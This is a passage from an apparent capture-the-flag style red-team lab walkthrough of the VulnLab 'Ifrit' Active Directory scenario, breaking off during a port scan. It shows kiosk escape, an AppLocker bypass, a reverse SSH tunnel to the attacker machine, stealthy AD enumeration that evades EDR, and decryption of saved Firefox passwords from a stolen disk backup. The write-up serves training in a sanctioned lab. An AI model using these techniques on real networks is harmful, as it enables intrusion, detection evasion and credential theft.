POSTS

VULNLAB: Ifrit

Ifrit is an Assumed-Breach scenario with the main objective is getting domain administrator privileges in the ifrit.vl Domain. It designed for those with foundational AD and pentesting knowledge to hone covert red teaming skills. Players aim for Domain Admin while evading real-time detections, practicing AD enumeration, exploitation, certificate services, lateral movement, EDR bypass, and relay attacks across multiple forests.

VULNLAB: Ifrit
19819 words · 94 min

Overview

  • Type Red Team Labs
  • OS Mixed
  • Severity Easy (Hard if we want to remain stealthy)
  • Creator xct
  • Release date 2024 Aug 8

Showcased proficiency

  • Common Active Directory Attacks
  • Basic Reverse Engineering
  • Abusing Active Directory Certificate Services
  • Lateral Movements across multiple Domains & Forests
  • Bypassing modern AV

Rule of Engagement (ROE)

In this Assumed-Breach Scenario, your main objective is getting domain administrator privileges in the “ifrit.vl” Domain.

The company created the following low-privileged user accounts in the “eu-ifrit.vl” domain for you:

# Users
Caroline.Hunter
Michelle.Jordan
Wendy.French
Joyce.Johnson
Kathleen.Walker
Tina.Dawson
Gavin.Dixon
Robin.Smith
Marcus.Taylor
Jemma.Smith
Annette.King
Mohammed.Ward
Laura.Robinson
Henry.Jordan
Bernard.Turner
Peter.Nash
Jade.Perry
Barry.Cox
Martin.Marsden
Grace.Dunn

# Password
PenEuIfrit527#

You can use these accounts to log into a VDI environment at https://vdi02.eu-ifrit.vl/RDWeb/ (172.16.40.225).

Besides reaching the main objective, your secondary goal is to complete the objective without triggering any detection.

If you manage to do so, please write a message to xct.

Please do not RDP to DEV05, a user is working on a critical project there.

If you haven’t regenerated your vpn pack recently, add these routes manually:

sudo ip route add 172.16.40.0/24 via 10.8.0.1 dev tun0 
sudo ip route add 172.16.41.0/24 via 10.8.0.1 dev tun0

To access the network we need to use an appropriate ovpn file: rtl-aws.ovpn.

Completing the lab awards a badge.

Enumeration

Stard and join the instance via Discord /rtl lab:Ifrit (Easy) and let’s go:

image

Add vdi02.eu-ifrit.vl in /etc/hosts

We tried different way to connect to this entry point.

Using the client Remmina:

image

Failed (the logon is ok but the session is closed just after)

Or via command line using xfreerdp:

$ xfreerdp /u:'Henry.Jordan' /p:'PenEuIfrit527#' /d:eu-ifrit.vl /v:vdi02.eu-ifrit.vl /dynamic-resolution /timeout:60000 +clipboard

Failed

Or via browser:

image

Success

Interesting, we access to a Work Resources and not a full RDP session:

image

More info here: Microsoft Remote Desktop Web client

Click on Firefox and on WordPad, both download an RDP profile:

image

Open the WordPad profile with Remmina:

Fill the credentials and go:

image

Ok we access to something like Remote Desktop App, kind of Windows Kiosk that limit our access to only WordPad App.

If we click on Open or Save we can see that the restriction is not so hard because we can access to the disk and also to a network shared etc:

image

So we can start some enumeration from here.

List of users who has been connected to this machine:

image

Checked access to all other users folder but blocked, requested admin access

List of installed softwares:

image

Nothing really interesting

On the top bar we can type any command that we want to run, like execute the task manager:

image

image

We can see some good stuff as Defender and Elastic EDR are present so be carefull to do not trigger any alerts and catch by the SOC

List of connected users:

image

We launch a new Explorer to be able to have a full RDP session then close task manager and wordpad as well:

image

image

We open a command prompt instead of a powershell as seems less suspicious and not trigger any alert:

image

Ohhhh i’m thinking to be already catched by this action:

image

But … not me … we continue to be safe and stealth:

image

Warning
  • We have been catched 2 min after then update the way to proceed:
    • If we execute a new task in the Task Manager to call “cmd” then a command prompt is displayed with a location in “C:\Users\Henry.Jordan\Documents” without trigger any security alert.

Found inetpub\wwwroot but we don’t have write permission (not lucky as an easy escalation privilege if we could):

image

Ohhh wait, I have been detected :/ OMG my whoami command has been detect as suspicious:

image

  • Ok it’s fair as many attacker usually use this command to check which user they are using or whether privilege escalation has been successful

Take a note to do not use any basic default command for the future.

Update: when a sliver c2 beacon or implant is deployed then we can proceed with sa-whoami to do not be detected:

[server] sliver (MEAN_PRIZE) > sa-whoami 

[*] Successfully executed sa-whoami (coff-loader)
[*] Got output:

UserName		SID
====================== ====================================
EU-IFRIT\jack.smith	S-1-5-21-815464091-3988217837-1862656938-1320


GROUP INFORMATION                                 Type                     SID                                          Attributes               
================================================= ===================== ============================================= ==================================================
EU-IFRIT\Domain Users                             Group                    S-1-5-21-815464091-3988217837-1862656938-513  Mandatory group, Enabled by default, Enabled group, 
Everyone                                          Well-known group         S-1-1-0                                       Mandatory group, Enabled by default, Enabled group, 
BUILTIN\Administrators                            Alias                    S-1-5-32-544                                  
BUILTIN\Users                                     Alias                    S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\INTERACTIVE                          Well-known group         S-1-5-4                                       Mandatory group, Enabled by default, Enabled group, 
CONSOLE LOGON                                     Well-known group         S-1-2-1                                       Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\Authenticated Users                  Well-known group         S-1-5-11                                      Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\This Organization                    Well-known group         S-1-5-15                                      Mandatory group, Enabled by default, Enabled group, 
LOCAL                                             Well-known group         S-1-2-0                                       Mandatory group, Enabled by default, Enabled group, 
EU-IFRIT\it                                       Group                    S-1-5-21-815464091-3988217837-1862656938-1311 Mandatory group, Enabled by default, Enabled group, 
Authentication authority asserted identity        Well-known group         S-1-18-1                                      Mandatory group, Enabled by default, Enabled group, 
Mandatory Label\Medium Mandatory Level            Label                    S-1-16-8192                                   Mandatory group, Enabled by default, Enabled group, 


Privilege Name                Description                                       State                         
============================= ================================================= ===========================
SeShutdownPrivilege           Shut down the system                              Disabled                      
SeChangeNotifyPrivilege       Bypass traverse checking                          Enabled                       
SeUndockPrivilege             Remove computer from docking station              Disabled                      
SeIncreaseWorkingSetPrivilege Increase a process working set                    Disabled                      
SeTimeZonePrivilege           Change the time zone                              Disabled  

We will proceed to some AD enumeration without using anything in the command prompt but directly using a common method via explorer:

image

image

image

image

List of Domain users:

image

We can do the same to list the Computer objects:

image

image

image

We check also the Domains:

image

image

We modify the Columns to add some other like Description…

image

image

Check again the users and found some good cookies:

image

image

Found backup-admin:Anfang01! and client-admin:Anfang01! (need to check more deeply before try to use it if real account under some groups etc or if both are decoy accounts used as canary for honeypot

We open the “Control Panel” to check some network information:

image

Found the DNS server: 172.16.41.14 and that should be the DC as this computer is a Domain joined machine

Now in our command prompt, we will set an SSH proxy tunnel (we configure our local SSHD to listen on 2233/tcp and allow password authentication):

Z:\>ssh user@10.8.0.230 -R 8000 -p 2233 -N
The authenticity of host '[10.8.0.230]:2233 ([10.8.0.230]:2233)' can't be established.
ECDSA key fingerprint is SHA256:TKVgARTfDDPTGJM9E5mPb6tTf04gA1CckN2+u0kLJWo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.8.0.230]:2233' (ECDSA) to the list of known hosts.
user@10.8.0.230's password:

Hummm triggered a low alert:

image

We change our configuration in /etc/proxychains4.conf:

...
socks5 127.0.0.1 8000

Now we use our proxy to list DNS records:

$ proxychains -q dig +tcp any eu-ifrit.vl @172.16.41.14                                                                                     

; <<>> DiG 9.20.0-Debian <<>> +tcp any eu-ifrit.vl @172.16.41.14
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 35249
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;eu-ifrit.vl.			IN	ANY

;; ANSWER SECTION:
eu-ifrit.vl.		600	IN	A	172.16.41.14
eu-ifrit.vl.		3600	IN	NS	dc03.eu-ifrit.vl.
eu-ifrit.vl.		3600	IN	SOA	dc03.eu-ifrit.vl. hostmaster.eu-ifrit.vl. 104 900 600 86400 3600

;; ADDITIONAL SECTION:
dc03.eu-ifrit.vl.	3600	IN	A	172.16.41.14

;; Query time: 273 msec
;; SERVER: 172.16.41.14#53(172.16.41.14) (TCP)
;; WHEN: Thu Aug 22 23:44:54 JST 2024
;; MSG SIZE  rcvd: 138

Confirmed the DC and add dc03.eu-ifrit.vl in /etc/hosts

We launch a nmap to scan quickly most common ports:

$ proxychains -q nmap -sT -p 22,80,8080,88,389,443,3389,5985 --open -Pn 172.16.41.14
Nmap scan report for dc03.eu-ifrit.vl (172.16.41.14)
Host is up (9.5s latency).
Not shown: 4 closed tcp ports (conn-refused)
PORT     STATE SERVICE
88/tcp   open  kerberos-sec
389/tcp  open  ldap
3389/tcp open  ms-wbt-server
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 67.06 seconds

Normally on this case, as we have a domain user, we can launch BloodHound-python or Netexec or whatever to proceed to AD enumeration.

But to keep our stealth position, we start using ADExplorer from https://live.sysinternals.com/ (that contains all SysInternals tools from Microsoft so normally do not trigger any alert).

$ wget https://live.sysinternals.com/ADExplorer64.exe
$ proxychains -q impacket-smbclient eu-frit.vl/henry.jordan:'PenEuIfrit527#'@172.16.41.14
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
home-backups$
homes
IPC$
NETLOGON
SYSVOL
transfer
# use home-backups$
# ls
drw-rw-rw-          0  Sun Jul 14 18:26:35 2024 .
drw-rw-rw-          0  Wed Jul 17 03:59:59 2024 ..
-rw-rw-rw-  239075328  Sun Jul 14 19:26:54 2024 1e3ae21e407bc487.vhdx
# mget 1e3ae21e407bc487.vhdx
[*] Downloading 1e3ae21e407bc487.vhdx

As we saw a new shared folder home-backups$, we dig into and found a virtual disk image backup so we profit to download it for an analysis purpose in near future.

Then we go to the shared folder transfer and put our tool:

# use transfer
# put ADExplorer64.exe
# ls
drw-rw-rw-          0  Thu Aug 22 18:39:40 2024 .
drw-rw-rw-          0  Wed Jul 17 03:59:59 2024 ..
-rw-rw-rw-     661912  Thu Aug 22 18:39:43 2024 ADExplorer64.exe
drw-rw-rw-          0  Sun Jul 14 17:59:43 2024 temp

Before copy it from transfer to any location, we check if AppLocker is set:

image

Ok AppLocker is in Enforcement Mode for Appx, Exe… (only for DLL not enforced) then if we launch any App under user folder etc then we will trigger an alert

image

Only local admin are allowed to execute any App

image

Found a rule that all users are allowed to execute any App if located in C:\Windows folder

Then in our RDP session we go to transfer and cut/paste to the C:\Windows\Tasks folder as excluded for AppLocker rules:

image

image

Then run it (waiting few minutes because smartscreen try to contact Internet then waiting the fallback to ask user to take decision on run it or not):

image

image

To check locally, we create a snapshot:

image

Then we cut/paste to the transfer shared folder then download it to our attacker machine:

image

$ proxychains -q impacket-smbclient eu-frit.vl/henry.jordan:'PenEuIfrit527#'@172.16.41.14
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# use transfer
# ls
drw-rw-rw-          0  Thu Aug 22 19:15:52 2024 .
drw-rw-rw-          0  Wed Jul 17 03:59:59 2024 ..
-rw-rw-rw-    3637684  Thu Aug 22 19:15:52 2024 DC03_ADsnapshot.dat
drw-rw-rw-          0  Sun Jul 14 17:59:43 2024 temp
# mget DC03_ADsnapshot.dat
[*] Downloading DC03_ADsnapshot.dat

After that we delete permanently ADExplorer64.exe and DC03_ADsnapshot.dat on the remote targets.

We use ADExplorerSnapshot.py as a parser to be able to convert our snapshot to an ingestor for BloodHound.

$ git clone https://github.com/c3c/ADExplorerSnapshot.py
$ cd ADExplorerSnapshot.py
$ python3 -m venv venv         
$ source venv/bin/activate
$ pip3 install . 
$ python3 ADExplorerSnapshot.py -m BloodHound ../DC03_ADsnapshot.dat   
[*] Server: DC03.eu-ifrit.vl
[*] Time of snapshot: 2024-08-22T19:12:45
[*] Mapping offset: 0x2add3d
[*] Object count: 3862
[+] Parsing properties: 1499
[+] Parsing classes: 269
[+] Parsing object offsets: 3862
[+] Preprocessing objects: 321 sids, 5 computers, 1 domains with 1 DCs
Traceback (most recent call last):
  File "/home/user/VULNLAB/Ifrit/ADExplorerSnapshot.py/ADExplorerSnapshot.py", line 2, in <module>
    adexpsnapshot.main()
  File "/home/user/VULNLAB/Ifrit/ADExplorerSnapshot.py/adexpsnapshot/__init__.py", line 1133, in main
    ades.outputBloodHound()
  File "/home/user/VULNLAB/Ifrit/ADExplorerSnapshot.py/adexpsnapshot/__init__.py", line 129, in outputBloodHound
    self.preprocessCached()
  File "/home/user/VULNLAB/Ifrit/ADExplorerSnapshot.py/adexpsnapshot/__init__.py", line 178, in preprocessCached
    Pickler(open(cachePath, "wb")).dump(dico)
_pickle.PicklingError: Can't pickle <class 'types.wchar[]'>: attribute lookup wchar[] on types failed

Failed. Workaround available here Unable to Pickle wchar[] #45

Open adexpsnapshot/__init__.py and change like below:

image

Then retry:

$ python3 ADExplorerSnapshot.py -m BloodHound ../DC03_ADsnapshot.dat
[*] Server: DC03.eu-ifrit.vl
[*] Time of snapshot: 2024-08-22T19:12:45
[*] Mapping offset: 0x2add3d
[*] Object count: 3862
[+] Parsing properties: 1499
[+] Parsing classes: 269
[+] Parsing object offsets: 3862
[+] Preprocessing objects: 321 sids, 5 computers, 1 domains with 1 DCs
[+] Collecting data: 217 users, 55 groups, 13 computers, 0 certtemplates, 0 CAs, 2 trusts
[+] Output written to DC03.eu-ifrit.vl_1724321565_*.json files
$ deactivate
$ ls *.json
DC03.eu-ifrit.vl_1724321565_cert_bh.json        DC03.eu-ifrit.vl_1724321565_cert_ly4k_tpls.json  DC03.eu-ifrit.vl_1724321565_domains.json  DC03.eu-ifrit.vl_1724321565_users.json
DC03.eu-ifrit.vl_1724321565_cert_ly4k_cas.json  DC03.eu-ifrit.vl_1724321565_computers.json       DC03.eu-ifrit.vl_1724321565_groups.json

Success

Now we injest all to BloodHound.

Note

BloodHound (eu-ifrit.vl)

We can import JSON to BloodHound and see user, computer objects etc but we shouln`t be see the ACL data. Seems some limitation and as it’s an Alpha version then need to be improved.

So, we back to get them using legacy LDAP query.

proxychains -q ldapsearch -LLL -H ldap://dc03.eu-ifrit.vl -D 'EU-IFRIT\henry.jordan' -w 'PenEuIfrit527#' -b "DC=EU-IFRIT,DC=VL" -N -o ldif-wrap=no -E '!1.2.840.113556.1.4.801=::MAMCAQc=' "(&(objectClass=*))" > DC03.EU-IFRIT.VL_objects.txt
$ tail -20 DC03.EU-IFRIT.VL_objects.txt 
nTSecurityDescriptor:: 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
name: TSGateway
objectGUID:: NXr623lox0Cafbfqh3WOXg==
keywords: 10.0
keywords: 2073c12b-e403-41e0-a8fe-f48935704605
keywords: TSGateway
serviceClassName: TSGateway
serviceBindingInformation: 443
serviceDNSName: VDI02.eu-ifrit.vl
serviceDNSNameType: A
objectCategory: CN=Service-Connection-Point,CN=Schema,CN=Configuration,DC=eu-ifrit,DC=vl
dSCorePropagationData: 20240823054351.0Z
dSCorePropagationData: 16010101000000.0Z

# refldap://DomainDnsZones.eu-ifrit.vl/DC=DomainDnsZones,DC=eu-ifrit,DC=vl

# refldap://ForestDnsZones.eu-ifrit.vl/DC=ForestDnsZones,DC=eu-ifrit,DC=vl

# refldap://eu-ifrit.vl/CN=Configuration,DC=eu-ifrit,DC=vl

We got the text data but not possible to ingest like that directly to BloodHound.

We use ldapsearch_parser.py and BOFHound, an offline BloodHound ingestor and LDAP result parser to transform these outputs then ingest to BloodHound.

$ wget https://gist.githubusercontent.com/kozmer/725cde788e4b3c8bdd870468c243916b/raw/31fe6dc8eb89bb4bcac414f55bc91169d63864d8/ldapsearch_parser.py
$ git clone https://github.com/coffeegist/bofhound               
$ cd bofhound     
$ python3 -m venv venv                                                                   
$ source venv/bin/activate          
$ pip3 install . 
$ cd ..
$ python3 ldapsearch_parser.py DC03.EU-IFRIT.VL_objects.txt DC03.EU-IFRIT.VL_objects_fixed.txt
$ bofhound -i DC03.EU-IFRIT.VL_objects_fixed.txt 

 _____________________________ __    __    ______    __    __   __   __   _______
|   _   /  /  __   / |   ____/|  |  |  |  /  __  \  |  |  |  | |  \ |  | |       \
|  |_)  | |  |  |  | |  |__   |  |__|  | |  |  |  | |  |  |  | |   \|  | |  .--.  |
|   _  <  |  |  |  | |   __|  |   __   | |  |  |  | |  |  |  | |  . `  | |  |  |  |
|  |_)  | |  `--'  | |  |     |  |  |  | |  `--'  | |  `--'  | |  |\   | |  '--'  |
|______/   \______/  |__|     |__|  |___\_\________\_\________\|__| \___\|_________\

                            << @coffeegist | @Tw1sm >>
    
[00:09:14] INFO     Parsed 463 LDAP objects from 1 log files
[00:09:14] INFO     Parsed 0 local group/session objects from 1 log files
[00:09:14] INFO     Sorting parsed objects by type...
[00:09:14] INFO     Parsed 217 Users
[00:09:14] INFO     Parsed 58 Groups
[00:09:14] INFO     Parsed 13 Computers
[00:09:14] INFO     Parsed 1 Domains
[00:09:14] INFO     Parsed 1 Trust Accounts
[00:09:14] INFO     Parsed 7 OUs
[00:09:14] INFO     Parsed 5 GPOs
[00:09:14] INFO     Parsed 0 Schemas
[00:09:14] INFO     Parsed 0 Referrals
[00:09:14] INFO     Parsed 159 Unknown Objects
[00:09:14] INFO     Parsed 0 Sessions
[00:09:14] INFO     Parsed 0 Privileged Sessions
[00:09:14] INFO     Parsed 0 Registry Sessions
[00:09:14] INFO     Parsed 0 Local Group Memberships
[00:09:14] INFO     Parsed 2393 ACL relationships
[00:09:14] INFO     Created default users
[00:09:14] INFO     Created default groups
[00:09:14] INFO     Resolved group memberships
[00:09:14] INFO     Resolved delegation relationships
[00:09:14] INFO     Resolved OU memberships
[00:09:14] INFO     Linked GPOs to OUs
[00:09:14] INFO     Resolved domain trusts
[00:09:14] INFO     JSON files written to current directory
$ deactivate

And now we can inject all JSON files to BloodHound and be able to see all included ACL.

We have 3 trusted domains, we 1 bilateral trust between EU-IFRIT.VL and IT-IFRIT.VL:

image

Our user does not have any special privilege:

image

We have 3 Domain admins:

image

If we can take over VDI02 (computer object) or PROC (user object) then we can also take over the Domain Controller:

image

image

Below the list of Tier0 or High value objects:

image

Below the list of all Domain computers:

image

Using dig via our proxychains to the DC (as DNS server) then we find the IP address of DEV05 (others no answer):

  • VDI01
  • VDI02 172.16.40.225
  • DC01
  • DC03 172.16.41.14
  • DC07
  • DEV01
  • DEV02
  • DEV05 172.16.41.40
  • SQL01
  • SQL03
  • BACKUP01
  • RAS50005
  • RAS50011
  • RAS50014
  • RAS50021

Add dev05.eu-ifrit.vl in /etc/hosts

Virtual disk image analysis

We downloaded previously 1e3ae21e407bc487.vhdx so let’s dig into it if we can grab some sensitive information.

Following this guide virtual disk images windows-ubuntu, we mount the VDHX file to our machine:

$ sudo apt install libguestfs-tools
$ sudo mkdir /mnt/vdisk
$ sudo guestfish --rw -a 1e3ae21e407bc487.vhdx 
Warning: program compiled against libxml 212 using older 209

Welcome to guestfish, the guest filesystem shell for
editing virtual machine filesystems and disk images.

Type: β€˜help’ for help on commands
      β€˜man’ to read the manual
      β€˜quit’ to quit the shell

><fs> run
 100% βŸ¦β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’β–’βŸ§ 00:00
><fs> list-filesystems 
/dev/sda2: ntfs
><fs> exit

Found that the partition is /dev/sda2 using ntfs format

$ cat /etc/passwd | grep user
user:x:1000:1000:user,,,:/home/user:/usr/bin/zsh
$ sudo guestmount --add 1e3ae21e407bc487.vhdx -o uid=1000 -o gid=1000 -o allow_other --rw /mnt/vdisk -m /dev/sda2

Then we access to all data on this disk:

image

Seems something interesting in Jack.Smith folder:

image

image

Firefox profile credentials cracking (jack.smith)

$ cd /mnt/vdisk/Jack.Smith/profiles

$ ls             
AlternateServices.bin                  broadcast-listeners.json  datareporting               gmp-gmpopenh264     pkcs11.txt             sessionCheckpoints.json             times.json
ExperimentStoreData.json               cache2                    extension-preferences.json  gmp-widevinecdm     places.sqlite          sessionstore-backups                webappsstore.sqlite
SiteSecurityServiceState.bin           cert9.db                  extension-store             handlers.json       places.sqlite-shm      sessionstore.jsonlz4                webappsstore.sqlite-shm
Telemetry.FailedProfileLocks.txt       compatibility.ini         extension-store-menus       jumpListCache       places.sqlite-wal      settings                            webappsstore.sqlite-wal
activity-stream.discovery_stream.json  containers.json           extensions                  key4.db             prefs.js               shield-preference-experiments.json  xulstore.json
activity-stream.weather_feed.json      content-prefs.sqlite      extensions.json             logins-backup.json  protections.sqlite     startupCache
addonStartup.json.lz4                  cookies.sqlite            favicons.sqlite             logins.json         safebrowsing           storage
addons.json                            cookies.sqlite-shm        favicons.sqlite-shm         minidumps           saved-telemetry-pings  storage.sqlite
bookmarkbackups                        cookies.sqlite-wal        favicons.sqlite-wal         parent.lock         search.json.mozlz4     targeting.snapshot.json
bounce-tracking-protection.sqlite      crashes                   formhistory.sqlite          permissions.sqlite  security_state         thumbnails
           
$ cat logins-backup.json 
{"nextId":2,"logins":[{"id":1,"hostname":"http://git.ifrit.vl","httpRealm":null,"formSubmitURL":"http://git.ifrit.vl","usernameField":"user[login]","passwordField":"user[password]","encryptedUsername":"MEIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECFvubpLtkV7fBBiFdFgKaPf9KC4aHS1vvUo+yq1rffq3ACU=","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECA9ZszeOMDO2BBCfhJomJzmGeOF1GSsHhzxV","guid":"{2d7bfd7c-3b15-4eeb-95f9-bcb3f92263b9}","encType":1,"timeCreated":1720948608620,"timeLastUsed":1720948608620,"timePasswordChanged":1720948608620,"timesUsed":1,"syncCounter":1,"everSynced":false,"encryptedUnknownFields":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECAhphWObdCQPBAiGUZE4gXKXMg=="}],"potentiallyVulnerablePasswords":[],"dismissedBreachAlertsByLoginGUID":{},"version":3}

$ cat logins.json 
{"nextId":2,"logins":[{"id":1,"hostname":"http://git.ifrit.vl","httpRealm":null,"formSubmitURL":"http://git.ifrit.vl","usernameField":"user[login]","passwordField":"user[password]","encryptedUsername":"MEIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECJe2Qkxy8MsjBBi29TArA/n/ihTvzMUAd9z1lgVZXc1TR1s=","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECLx3W+60hAWiBBDejBvl0zZqTKbzBBEf22FG","guid":"{2d7bfd7c-3b15-4eeb-95f9-bcb3f92263b9}","encType":1,"timeCreated":1720948608620,"timeLastUsed":1720948614552,"timePasswordChanged":1720948608620,"timesUsed":2,"syncCounter":1,"everSynced":false,"encryptedUnknownFields":null}],"potentiallyVulnerablePasswords":[],"dismissedBreachAlertsByLoginGUID":{},"version":3}

Found Firefox’s profile with saved credentials and the key4.db

Let’s go to crack it.

$ git clone https://github.com/unode/firefox_decrypt
$ cd firefox_decrypt 
$ python3 firefox_decrypt.py /mnt/vdisk/Jack.Smith/profiles  
2024-08-24 01:58:13,890 - WARNING - profile.ini not found in /mnt/vdisk/Jack.Smith/profiles
2024-08-24 01:58:13,890 - WARNING - Continuing and assuming '/mnt/vdisk/Jack.Smith/profiles' is a profile location

Website:   http://git.ifrit.vl
Username: 'jack.smith@ifrit.vl'
Password: 'JigokuNoKaen10'

Found jack.smith@ifrit.vl:JigokuNoKaen10

Get the IP of git.ifrit.vl:

$ proxychains -q dig +tcp any git.ifrit.vl @172.16.41.14                                  

; <<>> DiG 9.20.0-Debian <<>> +tcp any git.ifrit.vl @172.16.41.14
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8255
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;git.ifrit.vl.			IN	ANY

;; ANSWER SECTION:
git.ifrit.vl.		3600	IN	A	172.16.40.150

;; Query time: 273 msec
;; SERVER: 172.16.41.14#53(172.16.41.14) (TCP)
;; WHEN: Sat Aug 24 01:45:05 JST 2024
;; MSG SIZE  rcvd: 57

Add git.ifrit.vl in /etc/hosts

Quick enumeration:

$ nmap -sT -v -T4 -p 22,80,443,8080,3128,389,135,445,5985,3389 --open -Pn 172.16.40.150 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-24 03:25 JST
Initiating Connect Scan at 03:25
Scanning git.ifrit.vl (172.16.40.150) [10 ports]
Discovered open port 22/tcp on 172.16.40.150
Discovered open port 80/tcp on 172.16.40.150
Discovered open port 3128/tcp on 172.16.40.150
Completed Connect Scan at 03:25, 0.29s elapsed (10 total ports)
Nmap scan report for git.ifrit.vl (172.16.40.150)
